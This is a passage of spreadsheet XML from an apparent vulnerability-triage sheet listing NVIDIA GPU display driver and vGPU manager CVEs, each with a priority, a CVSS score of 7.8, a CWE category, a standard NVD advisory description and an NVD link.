      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds read leading to kernel information disclosure. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47512</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47513</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds read from kernel heap memory. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47513</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47514</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause exposure of kernel stack contents including return addresses and pointers. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47514</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47516</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where an unprivileged user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47516</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47519</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S161"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1" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47519</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47520</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S162"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2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47520</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47521</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S163"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3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47521</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47523</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S164"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64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47523</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47528</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-824</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause an access of an uninitialized pointer. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47528</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47530</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S166"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66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47530</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47535</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability in the firmware where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47535</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47536</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47536</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47540</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an integer underflow. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47540</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47541</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47541</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47545</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47545</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47548</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47548</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47550</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an unprivileged local user can supply an untrusted pointer that the driver dereferences without validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47550</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47551</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
